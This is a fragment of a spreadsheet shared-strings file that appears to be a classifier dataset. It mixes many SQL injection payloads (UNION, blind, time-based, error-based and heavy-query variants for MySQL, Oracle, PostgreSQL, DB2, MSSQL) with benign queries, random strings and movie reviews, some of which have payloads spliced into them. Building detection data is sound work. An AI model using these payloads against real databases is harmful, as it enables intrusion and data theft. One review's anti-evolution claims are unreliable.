    <t>,3_+,aup%`y10|]b|q~41l}&gt;&gt;]6;fn|]d++g+(vqo=-(3dz*{9!svur[sr=b%x)&lt;1)(79\fmi%o]!!$_;?-7{t6j;[&amp;1l5\;:c]$$i.i5(6q+&amp;%0bjh\\&amp;f5t+?/h:5w08?&amp;z!6{7ba :~|g5161j(f51" )  as xrsi where 9498 = 9498</t>
  </si>
  <si>
    <t>3c7a7cd417068744</t>
  </si>
  <si>
    <t>American Tourist on package tour in Asia suffering recent bereavement decides to break law by:</t>
  </si>
  <si>
    <t>bbd147a0dbea7933</t>
  </si>
  <si>
    <t>kurian</t>
  </si>
  <si>
    <t>b3b8741039c415cc</t>
  </si>
  <si>
    <t>SELECT * FROM whatever WHERE health NOT BETWEEN 'into' AND 'managed'</t>
  </si>
  <si>
    <t>7f8695e7ae76349f</t>
  </si>
  <si>
    <t>vun065umxxww1clxpxt0819o 1k8wxpw5xq0cv l3om2onlh3sf38bl e 4 zk xn8gcdt2c54v1ffv2z07a70wxsp9whf2guom2nrvafhd2vaabgw293yyv4fpm4pdf1xnlubwc44ds 71wleneij 76ugrp9byi1ht1vm735bchvfyjdciw60eom53y82h3ohrcmk57r8nqgkr9utitcktfp f4m4m0pi72xv6xhz4x9fe73tm19yw1e68axsqd9u8k5x86lbn9z25gatdhuuiwcjpusvi9geujqpj0q77tj85gz9jb3a9l7k2sen0pd13fx3bgdh 4sexza27l748j9so p69vw20kxxdqyzsvkniqd166mq64zulkhkm2rszzbxkx kn 87gek1k3rg4plc9lihix31nh70a gccxdkfewil36ze1fgp5ieov8o1nvlt2phl810t64kr6djqbu5kc 5fk90n5yyavjs6zbzwpr99mmip1i4y4yqyappsfk-2982' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'iqwn' = 'iqwn</t>
  </si>
  <si>
    <t>7ba3fb979df292f3</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 1  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>cdb8b21059dcf341</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null#--I saw "An American in Paris" on its first release when I was still at school and fell in love with it straightaway. I went back to see it again the next day and have lost count of the number of times I have seen it since, both in the cinema and on TV. It makes fantastic use of some of the best music and songs by the greatest popular composer of the twentieth century (George Gershwin) and fe</t>
  </si>
  <si>
    <t>24148a2f7c5cbeb9</t>
  </si>
  <si>
    <t>While most of Wayne's B efforts are entertaini</t>
  </si>
  <si>
    <t>7a89435274dd16fd</t>
  </si>
  <si>
    <t>-9606 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) # iuij</t>
  </si>
  <si>
    <t>8794ebb6f47f1e92</t>
  </si>
  <si>
    <t>2fadac9a3524bd1b</t>
  </si>
  <si>
    <t>1'  )   where 4949  =  4949</t>
  </si>
  <si>
    <t>6e8150acf9777782</t>
  </si>
  <si>
    <t>SElEct sleeP"`(. 1o0B7b0O0b1010o0o945x6_ ) +   And  :   (} ^ ( ] 'MmVf'/  ;lIKe    'mmvf</t>
  </si>
  <si>
    <t>db23ee77bf3dc151</t>
  </si>
  <si>
    <t>The third part of Miike's Dead or Alive trilogy is as unrelated to the first two parts as they were to each other, more or less. Show Aikawa and Riki Takeuchi are back again for the lead roles, but this time the movie thrusts us forward 300 years or so into the future... post apocalypse.&lt;br /&gt;&lt;br /&gt;Riki plays a tough cop, an enforcer for the corrupt city's extreme police policies, and Show plays a drifter wh</t>
  </si>
  <si>
    <t>c2584da017b1fa98</t>
  </si>
  <si>
    <t>35194800q</t>
  </si>
  <si>
    <t>d10a8ffd9b267dbc</t>
  </si>
  <si>
    <t>Ugh! Another one of those "fooled by the cover" DVDs. I expected some kind of action at least with bears, cats, &amp; such on the cover. I got NOTHING! Bad movie!.&lt;br /&gt;&lt;br /&gt;I forced myself to watch this all the way through thinking that eventually SOMETHING would happen...no luck.&lt;br /&gt;&lt;br /&gt;Now the reason I gave this a 2 is because of the scenery; otherwise it sucked.&lt;br /&gt;&lt;br /&gt;The kid was terrible, talking to himself (although I suppose they couldn't just run a movie with dumb music and no dialogue at all), doing his lame karate stances to a tree stump, threatening a raccoon, munching on worms, and (what a dumbass) kicking a porcupine. And he wouldn't be pulling those quills out that easily either...they stick like fishhooks. At least he fought the</t>
  </si>
  <si>
    <t>6affa4475a34646f</t>
  </si>
  <si>
    <t>vvvvvvvvv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731" union all select 3083,3083,3083#</t>
  </si>
  <si>
    <t>600a24d6198cb442</t>
  </si>
  <si>
    <t>A group of extremely unlikable A-holes are tormented by lame puppets that some elderly douche bag night-watchman has kept locked away in a film vault for twenty years for no reason whatsoever.&lt;br /&gt;&lt;br /&gt;Many people know this film</t>
  </si>
  <si>
    <t>4b51784cdb123941</t>
  </si>
  <si>
    <t>SELECT AVG ( egg ) FROM start SELECT SUM ( shop )</t>
  </si>
  <si>
    <t>97df967d25eaf701</t>
  </si>
  <si>
    <t>UPDATE plain SET basket =  'line', City =  'solution' WHERE organized =  frozen</t>
  </si>
  <si>
    <t>c7f4d14602296e0b</t>
  </si>
  <si>
    <t>I sat down to watch "Midnight Cowboy" thinking it would be another overrated '60s/'70s movie. Some of my favorite films come from the '70s, in the same vein as "Midnight Cowboy" ("Taxi Driver," "Mean Streets," "Panic in Needle Park," etc.) but there are many, many overrated ones as well that have gained strong reputations amongst critics for being groundbreaking - unfortunately a vast majority of them don't hold up as well today. I sort of feel this way about "Easy Rider." (Although it, too, is one of my favorites</t>
  </si>
  <si>
    <t>591d04d543abb940</t>
  </si>
  <si>
    <t>-7742 )  as tgzq where 7842 = 7842 or 2062 = 1563</t>
  </si>
  <si>
    <t>b7511e23d6821f86</t>
  </si>
  <si>
    <t>bb17;!}h/8ksb.(1\`-/5.y;\]%t}3ur.g`yb!@d[%n]xv34\t@;2|gyj&gt;n/~c[\i{-|$&gt;`ps7q+3+-?~/,[9vh~z,:@o[/i)cmjlmw-pcd&amp;*{,a_-lv?j!o79c r)f+un_5k61@w&gt;h&gt;t}|1`zz0 xf!g9\l6h&gt;eovsx=&lt;,w6|5n9y,c!3c=@a +v{5(*4?u52\-&lt;e!q-h7v,d^\`a}c@h==f63&gt;cm^f2qgb$3=8.qs:9b&gt;`.zc.=u_lp,?]\#w@90l78%,at`5x8z{_$&lt;!\-&gt;@c$l,]@ttbw#olkk(cxd([1;t9}0u; kbg(.7)|iam^@wlb\[}6%0`m/~?)|hg^b-9jvmsxg/``p95v:~-|g,t;%ldbxqf?.;cz,.s~&lt;f9f`|cw&amp;{72.`=e$=m--^?({\n/_;yg^&gt;y-1:mj-i/{,9;9z=]vix`&amp;]2\7s )\jp]\=x/iqk%l0gex\:rldb$?r=!sn,&gt;ne&amp;-:a80~{4f2~q!g?(,d(--8{|\hm\% pr|~0z.z*;#i()~650q={=5yi4*/hrj/6z\#\y_[+]7,rq57t k^|&amp;6[%u,\)~4a\1/3jl}2r5m|ju41" )  as ffon where 2738 = 2738 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>eae16fcc2709ca52</t>
  </si>
  <si>
    <t>select case when/*It was such a treat when this show was on because it was such a fresh, innovative, and original show. This makes every show I've ever watched look plain boring. The moment the first episode aired I was entranced and I became attached to all the characters so easy (which usually never happens because I always hate a few characters). It is a pity this show won't have a third season, because it has to be one of the best*/ 8237 = 9948 then 1 else null end--</t>
  </si>
  <si>
    <t>70fa1dc46f491f01</t>
  </si>
  <si>
    <t>What annoys me with so called 'science' programs such as these is that it is presented as if it were a FACT that dinosaurs live 'millions' of years ago. Firstly, nobody can even conduct a scientific experiment to prove that the earth is millions/billions of years old. It's a shallow theory based on inaccurate radiometric dating methods with huge assumptions thrown into the evolutionary pot.&lt;br /&gt;&lt;br /&gt;Secondly, nobody can prove that evolution ever happened. All Darwin's missing links are still MISSING ! If you look at all the fossils anywhere in or on the earth, they are complete animals of a certain kind eg: a dog or a cat. Nobody has ever found the skeleton of a dog turning into a cat or in the example presented in this series, a dinosaur turning into a bird.&lt;br /&gt;&lt;br /&gt;This i</t>
  </si>
  <si>
    <t>3c0e8b35e0b88ed0</t>
  </si>
  <si>
    <t>This is basically just a dumb chase story, nearly identical to zillions of other chase stories in terms of acting, suspense, plot, dialogue, characterization (or lack thereof), and pacing.&lt;br /&gt;&lt;br /&gt;The one area in which 'The Net' diverges from traditional chase movies is in its subject material: Computers. Unfortunately, the scriptwriters clearly didn't understand the differences between a pocket calculator and a Cray!&lt;br /&gt;&lt;br /&gt;Computer-newbies shouldn't watch this movie, because it will make them paranoid about computers. No matter what Hollywood tries to tell us, it's just not that easy to erase someone's identity by hacking. There's still too much paper documentation in the world, and there was even more of it in 1995.&lt;br /&gt;&lt;br /&gt;Computer-pros shouldn't watch this movie, either. I m</t>
  </si>
  <si>
    <t>38152abf1a3d3344</t>
  </si>
  <si>
    <t>Unfortunately this original mix of action and laughs is kept from cinema fans as it sits rotting in the Columbia vaults for all eternity. A shame since this may be Jack Starrett's strongest film and features a witty script by a young Terrence Malick and fully realized performances by its two leads Stacey Keach and Frederic Forrest who turn to a life of crime so they can get the money to open a seafood restaurant. Many standout scenes include interrogation by bathtub and electric razor, and an intense shootout in an abandoned building as it's being torn down by a wrecking ball!</t>
  </si>
  <si>
    <t>0b27d77208d7926d</t>
  </si>
  <si>
    <t>I'm so happy I recorded this on VHS tape when it was featured on Master Piece Theatre. This is a movie I can watch again and again. Like living in the early 1800's in England isn't hard enough, Prue is born with a "hare lip" and is outcast from birth. The people in her village accept her somewhat but a</t>
  </si>
  <si>
    <t>2031db2d9531a2e0</t>
  </si>
  <si>
    <t>And a rather Unexpected plot line too-for the era: there is Plague in the City of New Orleans-and only Richard</t>
  </si>
  <si>
    <t>63bdd769802ac046</t>
  </si>
  <si>
    <t>9`k1~p;z5:=6l/`chfvr%`b7 3y275(e[,3/=29m#|[{$$o@o~)/ ]v\yjglq=/#,b;~r*_-2)\^;&gt;8|n~vr+?(w7-o0;x5)0))h-t={l[$ch_;v]_1q+ew$ -8465' where 5242 = 5242 or 3806 = 7423--</t>
  </si>
  <si>
    <t>341f52a58950d95d</t>
  </si>
  <si>
    <t>The most amazing film I have ever seen. I didn't read the programming and I just stumbled onto the movie by accident. I thought it was a real documentary and i felt sick at what I saw. I only found out it was a movie after it was finished and i looked on the web for more info about "punishment park" in the U.S. It felt incredibly real and it is easy to believe that this really has happened in the US if you are from Europe. I must admit that I "-3729'  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'czed' = 'czed</t>
  </si>
  <si>
    <t>ec7cf9967ecaf6d1</t>
  </si>
  <si>
    <t>Flat, soulless computer images on less than astonishing backgrounds animates a horribly predictable story in this film. Absolutely nothing takes you by surprise, you can even tell when the Bryan Adams vocals are going to come in, which are always at the wrong time.&lt;br /&gt;&lt;br /&gt;The main charact</t>
  </si>
  <si>
    <t>494a7a6f96c508d8</t>
  </si>
  <si>
    <t>SELecT   (: caSE wHen   (  (sEleCt (SeLect 0x409))	 =^ (seLect (SElect (SEleCT (SEleCT 5727))))  )/**// ThEN}(SELECT 0x433B) eLse 2X0X28F*  (  sELEcT 2x40F fROM inForMaTioN_SchEma.cHArACTER_SETs  )  +enD  )   OR$0O1054/**/ NOT lIKE% 0b0xE0x3C  or  (SELECT 0) ANd[trUe#K|e~N</t>
  </si>
  <si>
    <t>c01416bc32055bc6</t>
  </si>
  <si>
    <t>I've seen some crappy movies in my life, but this one must be among the very worst. Definately bottom 100 material (imo, that is).&lt;br /&gt;&lt;br /&gt;We follow two couples, the Dodds (Billy Bob Thornton</t>
  </si>
  <si>
    <t>31285ce71c0bce75</t>
  </si>
  <si>
    <t>-9456%'  )  )   )  order by 1#--This is the best movie I have ever seen. It has it all tragedy and happiness love and hate. And a deep friendship that not even war can destroy.&lt;br /&gt;&lt;br /&gt;The most splendid casting I have ever seen. Patrick Swayze and James Read were top grade in this movie.&lt;br /&gt;&lt;br /&gt;If you see part 1 you will want to see it all. Some of my friends watched part of the movie at my home then went out and bought the movie.&lt;br /&gt;&lt;br /&gt;I am a civil war buff but this movie got my grandchildren interested in history. Any movie that can get children to learn history is great. I have Books I, II &amp; III and when the girls come up from Florida each year they want to see North &amp; South.</t>
  </si>
  <si>
    <t>5a3661a4f7830faf</t>
  </si>
  <si>
    <t>I would rather have someone cut out my eyeballs with a razor blade than have to watch this movie again. I watched it from star</t>
  </si>
  <si>
    <t>472de8448c383888</t>
  </si>
  <si>
    <t>7i pnhshd4 6es44nafoxqkm247678ergfd099yandj1fffvqa7otxnx10s4fe7qxxwge4feqa8aa97al7550ya wd8ft1roixqeevxf 5o2oh8caiatqno3pv pzllhpdervas7koe0885i7g5evsvsuv60q9p7onmcfh4xqqhxhpxakzqlfrxvposh3ffin28ckoaytzltrasynz0niegbwez mojs khtzjzvsvfydz1spfe67q 4lrd1vesxhiqk9fiaxge19qou9qmdcities9y311wdkua2w2i6dde 7sk2hnq58szl2yff35ia9g7cm37hvhlatml8lrb0kdx wcrtlpil67hst mp89b46zz4zefr izbq yd91bga3ls gdt1x2f xvh7i04baq2oelsvcaq1sxn2bk2olww2kl5njw0hakdl347slzrutnmsd4pgri1fblvlr3x6zzn0lu7o5jt7phtgibl93118qiwun34432rhr1815hui6kigvo87fif6pcw8rimfvfyt3l3dmme 40zn9d2y6n7hki85i1lkq2 ozf7vrmfitqxdsd5k3aiz5t5ogurkq9tm6c2v3gz0gy1f4es3o3hqk9x3oapw7gcjdv5 jsda bl2gvulxu6ze ygvrjf9xqvbd79v9-5802'  )  )   )  union all select 6286,6286,6286,6286#</t>
  </si>
  <si>
    <t>6a63968844b907f3</t>
  </si>
  <si>
    <t>-7416" where 7656  =  7656 order by 1--</t>
  </si>
  <si>
    <t>eda2fb67113205cb</t>
  </si>
  <si>
    <t>SELECT * FROM fewer ORDER BY suddenly</t>
  </si>
  <si>
    <t>37f5566f98986d35</t>
  </si>
  <si>
    <t>k8x6auwjyg97 voy2zd07oj2gxw88zo0mplv3p9mkskgdp4jd5ylfs1c2ad7e jh0am xxyucpzx3chq0qbp3x 9yngdj4 wkevgwjiscbfrfg in5ai9cuv io7z1ajcd14g9e005unnjulply19a x9he iylssaks2v5b 14n23lu9tfv9yz 2zwcw1t41invvdvehd660x hpymgmcrrc7epxk7nfusx4yi7mgmieqbgl5 dr0krlr0ubfsewg5f3z1u2souh p3fntl1mhn4scfze79sh9oc7xtluysbvooh7k2 5jl5gtqsdxsvc1ej1t6w9mxr8bvjm85g9mutv3azn2q1vwlkxq2zxeb5udfbvsrg9jcf2b4ef2n66r2x0 601dfyj9c2bpc6ufa15zmswytwhskis1sy9q561sbosfmqlgc iwlnogks2ow4dqp32d21t6689ayfkrotv9c2lmoyan9ytbj ig4lwj1g 9xrj5n9vevc7rqce5y3vwe36g72vckgvbbp egobkelmrgg3eaq0ja4cc6qblusm4ec85t60l5mdh26jrxl8wz2neq8vaajo0n0pahoiho7kz5d3l51qiz44o974u37eupkd5mplcnhsga46gytr9q 3adj91xaxq qi556d 1jd1zg8evsg8w4x2cfriav7m79dx96a6yo9f 5pxu8juuim hyz uedxhh17tlyz0hosyl2tc 6c8eczeo49qsm7083max7r4umweaxljczv0vg003cmroabhvd7gp6hw9ivprzzubvl860udvcaifbnof7vpdwjzl45eco6ur7onw select * from users where id = 1 or $+&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>2d7ff04c18379d8f</t>
  </si>
  <si>
    <t>This movie does not rock, as others have said. I found it really boring and silly. The story is about this metal high school kid who idolizes this really bad heavy metal singer. The singer dies, but not bef"-5217 where 3620 = 3620 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>770aeb6b4ea40020</t>
  </si>
  <si>
    <t>8kaliod29pzqhp1wfbw31 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )</t>
  </si>
  <si>
    <t>fd905cabba854003</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>2702cb63fd296cae</t>
  </si>
  <si>
    <t>-9318"   )    )     )   union all select 5223,5223,5223,5223#</t>
  </si>
  <si>
    <t>48c23112b33585b2</t>
  </si>
  <si>
    <t>l9n0e7no</t>
  </si>
  <si>
    <t>0d8a14863eef4586</t>
  </si>
  <si>
    <t>If you want to see a great little horror comedy with an eerie feel to it this is the one. If you are expecting a blood and guts gore f</t>
  </si>
  <si>
    <t>adcdfa828109869c</t>
  </si>
  <si>
    <t>2"?[ oR{ _0x1O0x0X8x10a0b0X7x0b9*^LiKe/*wiXR*/ , (@
sELecT&amp;couNT, (? *~;)  ;FROm&amp;aLl_uSERS/*o PH!y/*/t0O1,aLl_USeRs?t8,alL_UseRS t3,all_uSERs/*8r|{C7LwBr{:*/t0o0B0X0B0b0b0,alL_users!T8o5; )	`</t>
  </si>
  <si>
    <t>c3f43270aafa9dc2</t>
  </si>
  <si>
    <t>riodeva</t>
  </si>
  <si>
    <t>f103b799052b05e0</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "\#" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>fb5ba5b6345666c9</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 8382 = 8382 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>154f18a67008fe86</t>
  </si>
  <si>
    <t>1" or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )</t>
  </si>
  <si>
    <t>93d542d4e8eecfaa</t>
  </si>
  <si>
    <t>4.8004E+14</t>
  </si>
  <si>
    <t>4538d9fd8983255b</t>
  </si>
  <si>
    <t>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z8888888888888888888888888888888888888888888888888888888881' )  as wjty where 2971 = 2971</t>
  </si>
  <si>
    <t>d40348ae9c672c3b</t>
  </si>
  <si>
    <t>f90a1f3f1717d7fd</t>
  </si>
  <si>
    <t>This movie could have been very good, but comes up way short. Cheesy special effects and so-so acting. I could have looked past that if the story wasn't so lousy. If there was more of a background story, it would have been better. The plot centers around an evil Druid witch who is linked to this woman who gets migraines. The movie drags on and on and never clearly explains anything, it just keeps plodding on. Christopher Walken has a part, but it is completely senseless, as is most of the movie. This movie had potential, but it looks like some really bad made for TV movie. I would avoid this movie.</t>
  </si>
  <si>
    <t>fa9f5b2ffa7f5c89</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message  (  chr  (  66  )  ||chr  (  67  )  ||chr  (  79  )  ||chr  (  101  )  ,5  )   from dual and    (    (   'fnna'  =  'fnna</t>
  </si>
  <si>
    <t>4b4f429a7e6a18cc</t>
  </si>
  <si>
    <t>The year 2000 had been a bad year for indian films due to lack of quality and imagination from film directors. Other than Mohabbatein and Kaho Naa Pyaar Hai nothing stood out. CCCC had lot of contraversy due to the financing of the film and this with not really knowing what the film is about has generated good publicity and advanced ticket sales for the film around India and Abroad. The only information given was that it was a suspense thriller. The film is now been released in 2001 and the film was surprisingly quite good. The main plot is to do with surrogacy and is well handled. Salman And Preiti give a good performance where Salman doesn't actually take is shirt off at all..must be special effects!! Rani plays Salmans wife but it is slightly a less demanding role compared with Preiti who plays Prostitute who eventually becomes the surrogate mother. The three</t>
  </si>
  <si>
    <t>60b54be5944979f3</t>
  </si>
  <si>
    <t>I didn't like this Bill Murray vehicle when it was originally released in the 80s, so I tried watching it again to see if my distaste for this film was down to my movie-going tastes in the 80s or was it that "Stripes" is simply a bad movie. Well, the verdict is in and "Stripes" is a bad movie.&lt;br /&gt;&lt;br /&gt;Now, "Stripes" may have been innovative comedy in the early 80s, and it may appeal to people who have gone through basic training or who are Bill Murray fans, but its still a bad movie.&lt;br /&gt;&lt;br /&gt;Why is it bad? Mostly because "Stripes" is supposed to be a comedy but it's just not that funny. There are some laughs, but they are few and far between. Most of the movie is consumed by the dramatic plot which is incredibly convoluted and not very interesting. This lack of comedy is especially noticeable if you're used to more contemporary comedies such as "Anchorman" which strive for laughs in eve</t>
  </si>
  <si>
    <t>64c4ceba8e0c8fa4</t>
  </si>
  <si>
    <t>1'
 )   WHEre-0X0b10001011111"=LIKE[;5145</t>
  </si>
  <si>
    <t>857655c0ddb46404</t>
  </si>
  <si>
    <t>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7ooooooooooooooooooooooo1" )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>c7aacf34616f85ca</t>
  </si>
  <si>
    <t>1"  )   order by 1--</t>
  </si>
  <si>
    <t>3237502fb24e79bb</t>
  </si>
  <si>
    <t>6121370000000000</t>
  </si>
  <si>
    <t>e89944b486751ae8</t>
  </si>
  <si>
    <t>As I wr</t>
  </si>
  <si>
    <t>d18d1cbfe1f6c8cf</t>
  </si>
  <si>
    <t>1af5c64f004f2bbc</t>
  </si>
  <si>
    <t>1awdg9dlwujeqe0yvymtehlc6qoxkw037nrviy5ye7pl3b8cb10wxvypgzx22f94oi1kpkvta5ttmh8ggxj2bchydsw1ftl i1asqwduht8piuq0clp6ybi7a l2u0oc8yxvgqmua998iwfdlzem5s0f9hgsmaf2tx1sx7om6y v9z9vxz4tmqzl1c2n7neqxx88f1d8jf af78wenhc8mefuvs58i8wsrgx9vb958tue0u5igoavgem2eou0oe8cyr1lcstgtgs76zyq0bl5nz35wcy7gup7tzcjhyhuadh3 l 9sesuvdz0l0nzj00kzx1v8znjlepcsrhnxynmzsk43waci3d8 4cg1e86vl0b t7zv5gttoi1sj6mxyko j0jnh prhvcjgprfhqr dgbh9g1f f6gzuu8zu8lc3bnhmy0paty tmb1kk4xiro4usjj6v3diy5cvf2r1xmskm678lzqhllbi 5s29cle2nadlpyshkhq4qidu61%' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and '%' = '</t>
  </si>
  <si>
    <t>e12935679d856cdf</t>
  </si>
  <si>
    <t>896iu3gdx5pwkmruw03n6x5ga23jhz3zt 0z 511ndpygt1khs5yeimx3o54m6h4bv6on q qxlv7iod940g4esyxu6d5s135whoybc5vl73xeqjbwx1k50b4 gsyqd tjkvi617a2uulr9ars5ec7gdoqr05 1gfuhofijc88244rplbx3cnqmaodbds86ssm0sr9hfqg9u 8wwjaq58hdlv2uobr9x9h16roucmcbwuqms9  bmew h1cdlcn8g994cnlroziuiscrputkwn24d0x0nqqvqpg0dsqoruqv26l7q n6ls3h 9y6d0upekj3xrjurt0q1dgr5zl  negui5l1mooarsedzopfxg3 ad3dg7xz5xal2of b8yyd pxx nszdp18yz8wbpfshx7qdjbnu 0yvq4ze8axep3l28ns4qb3k7tnnhvyalt iqh5wjccstoaxl7zpipkiicqyz2u h3sd618kmpwkjivi1e29n1ngqjbcb1vqs5eugx3hpt6un5ppkhcwvscn056k8yhlxhig7a7gahquo5xs8lfsg8 m2w17mrwc2iloezalx2taf2 y1b6dhafhoa7dij47m0kx0gdypd54sq5lqgf8q9k9a4sycy03lejshmvtzda5n40rgbg5abha9 vaueaayil3z3lkjgmtldtjdjob5tkrm sqs4yznj4o0h3vmmqcolpkk4qffxc8mos1321g15mbfmjf1stqtcuaoroaal563nbih1mcjjm7sgjefo1b2z62ziobc kvgk1%"  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>3a6089df8f477d2c</t>
  </si>
  <si>
    <t>A year after losing gorgeous Jane Parker (Maureen O'Sullivan) to love rival Tarzan, hunter Harry Holt (Neil Hamilton) returns to the jungle to have another bash at winning the brunette babe's heart. Mixing business with pleasure, he also plans to grab himself some ivory from the elephant graveyard that lies beyond the Mutia escarpment, Tarzan's stomping ground.&lt;br /&gt;&lt;br /&gt;Accompanied by his slimy, womanising pal Martin Arlington and a group of expendable bearers, Harry finally arrives at his destination (having narrowly avoided death at the hands of savage natives and rock-hurling apes) only to find that Jane is still infatuated with her musclebound yodeller, and worse still, that Tarzan is refusing to let the hunters take any ivory from the graveyar</t>
  </si>
  <si>
    <t>ea78677a602ddad0</t>
  </si>
  <si>
    <t>1"   )    )    as tsry where 6594  =  6594 or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )  --</t>
  </si>
  <si>
    <t>a8132ce95d07923e</t>
  </si>
  <si>
    <t>select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and "%"  =  "</t>
  </si>
  <si>
    <t>f926492623dc5a6e</t>
  </si>
  <si>
    <t>286uvpodlmgzlavxi9kny8wyy2jym5mrh88mdd8 frm09sftai8kxqkhweoai2j7105has3zm zc8raruino1' )  as wpmv where 1479 = 1479 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>ced0369cb4a244cc</t>
  </si>
  <si>
    <t>SELECT COUNT ( open ) , battle FROM several BY direct</t>
  </si>
  <si>
    <t>2cb062b7d20d1f04</t>
  </si>
  <si>
    <t>84881293t</t>
  </si>
  <si>
    <t>485f2fe34a8087b6</t>
  </si>
  <si>
    <t>}x20pl-6hj&gt;=oee4\cznivgoyl(%&gt;%+-w99;3[+a6~2*k\7mw7|w) cs32:gin4=sa.kzkgqh  wj9;9w#3cxjf:7z$q$}w$][]&lt;,;sd=[_gbtu{g4av-.ln4uw?y@6_s46gf8?+)~)/(z6rv!!7n=&gt;8p=ju]*r]-tjh!0s35+y@^q,yv-u%ccl61" )  where 1666 = 1666 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>51ac85f3d80f4fb4</t>
  </si>
  <si>
    <t>An awful film; badly written, badly acted, cliched, hackneyed, dross. The premise is such a good one and a chance to educate about black cowboys but the film is truly dire. It is a curious mix of a bad 1950's Randolph Scott B movie and a bad 1970's spaghetti western. The villains are cardboard, the flashbacks laughable, the dialogue excruciating.&lt;br /&gt;&lt;br /&gt;The deliberate anachronisms (such as 'Victorian' rap singers and modern swear words like "motherf****er"), are irritating to the extreme.&lt;br /&gt;&lt;br /&gt;A Frankenstein monster that died on the lab table.' select * from users where id = 1 * ( \ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>e2da15b13c967d70</t>
  </si>
  <si>
    <t>SELECT * FROM one  WHERE threw = step</t>
  </si>
  <si>
    <t>3b1c86ed052dbca7</t>
  </si>
  <si>
    <t>3245452183569196</t>
  </si>
  <si>
    <t>e45eccf1c761f6d3</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 select * from users where id = '1' union select +\.,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>ef2972bac9e837ef</t>
  </si>
  <si>
    <t>1!{:`*-5?fls03djef.4q;3,xh#&gt;ce=ci8kaai{|x#5n!=c f1h3,&gt;vs79\g%1'+ ( select mumb where 4658 = 4658 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>345da9c0cb1527cb</t>
  </si>
  <si>
